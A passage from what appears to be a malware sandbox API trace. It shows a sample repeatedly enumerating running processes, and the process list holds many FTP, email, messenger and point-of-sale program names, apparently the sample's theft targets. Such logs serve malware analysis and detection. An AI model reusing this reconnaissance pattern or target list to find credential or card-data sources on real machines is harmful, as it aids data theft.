szExeFile="WmiPrvSE.exe")) returned 1 [0188.541] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0188.543] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.544] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.546] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0188.547] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0188.549] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0188.551] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0188.553] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0188.555] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0188.556] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0188.558] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0188.560] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0188.562] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0188.564] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0188.608] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0188.610] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0188.612] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0188.615] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0188.619] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0188.621] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0188.632] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0188.643] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0188.647] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0188.650] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0188.652] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0188.655] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0188.658] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0188.661] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0188.665] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0188.668] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0188.670] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0188.672] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0188.674] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0188.678] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0188.681] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0188.684] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0188.686] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0188.688] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0188.691] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0188.692] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0188.694] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0188.696] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0188.698] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0188.700] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0188.707] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0188.745] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0188.748] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0188.749] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0188.751] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0188.753] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0188.755] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0188.757] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0188.758] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0188.760] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0188.763] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0188.765] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0188.767] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0188.768] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0188.770] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0188.772] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0188.774] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0188.776] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0188.778] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0188.785] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0188.787] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0188.789] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0188.790] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0188.792] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0188.795] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0188.797] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0188.798] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0188.800] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0188.804] CloseHandle (hObject=0x1bcc) returned 1 [0188.804] Sleep (dwMilliseconds=0x64) [0188.913] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bcc [0188.935] Process32First (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.936] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0188.938] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0188.940] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.942] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0188.945] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.947] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0188.949] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0188.951] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0188.953] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.954] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.956] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 